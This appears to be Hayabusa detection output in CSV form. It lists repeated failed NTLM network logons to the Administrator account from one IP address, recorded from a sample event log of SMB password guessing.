2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbaoz8rTZVXUjRAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d4eD3JQ5gquIqgND | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9slFFSSXhFxPqG1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDb5Up4KwJj0hN5n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxqIpDLlnf6Xyc34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTCTTYmKTIzzJwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oD3dLxlB3qWIhZEQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fe9xMOoCxPJIIyVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DW3YgBZYiGTeEw66 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VAKeeIcOeiQ3H9NF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmF3ot3gJCsBlSwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDjoResfZvvVqqE5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V4dwzMwvVtzztGwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qklApBFOMxVzucD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0IJSphtLB3eNARBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLOFe4w5KpJ2UaGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3JTWkGadY1fJE2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyTH0jxSZB2YVdhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NRq5XrcDkFvabCzh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlYwlgrsMy1kSgEC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AchwW4ifbZ41AQNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PaxF7Q8ue1Kex1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WAhW2PErXdwNVrx5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoAV3ESqieev2JMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFlWFijaFirgsAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSDjuqvzKLaWCWVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SL0CVu787iFRLiPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZQDORN33izpv4tGO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v470yorD43fgGyjC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBbLWVZFDqFxb7dW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJsowt9MrhXciLOZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uhCVFyMmDI5shASV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yd4SM9EGM7cnO6Z5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSR1tbtzdDaJDbXs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rNqyjBuN0Pq6WRO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vqpMAmE9OvHbFCh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfLQAaB0DPvxWQMB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0kvHMwnj2k0HMLQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kPqfVDftcR4iRDaw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bltwm2g13InAJM6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2iFr8ppe5NzukXF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EEUOBohBFRze6hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCOFn3WM71KmaZyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UdUkBxB1auduRfdS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2JaWoYK56HRGfW1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3JTCX9NIOpg6TFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zFGkdUVAdKcrrREB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oZW00FpKema01Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p4HbNQx0Acf83b1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aM5UCQbOLvcpI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGGChEAIdej9lBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CaFYB1ImWAWbH0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLa3lkxWiJ00raQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMzyi0jIVLNrodC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2repX0roAP2j0TI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gqcpIjdkNpmoTe4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edgo9UdNvmMJpiyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LpqOTu7Xn7ULipmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TP0efL79STMbuu9g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HkwWfRi0E5sVY6UT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkyCe9NXGExCQS5r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IGnhRwa7P7by9vJO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fh7IGliNbSyKwxpM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1QfgWsAqSYQfB9l5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8VM66P8Vluf7yrL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cdYiwh3QjdA0Zoge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ou3FPUI5bFcUvuFC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMUg8N7apFtUgX9d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U7Cn4n7jQAQaxP6y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urflPvd1vgYYi2ra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pqFtTDD69fNTKROG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: teUZYpNyqJ64Dgcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9kaKSy3DV5fRKvTc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtiZUzpwrnuWIjna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
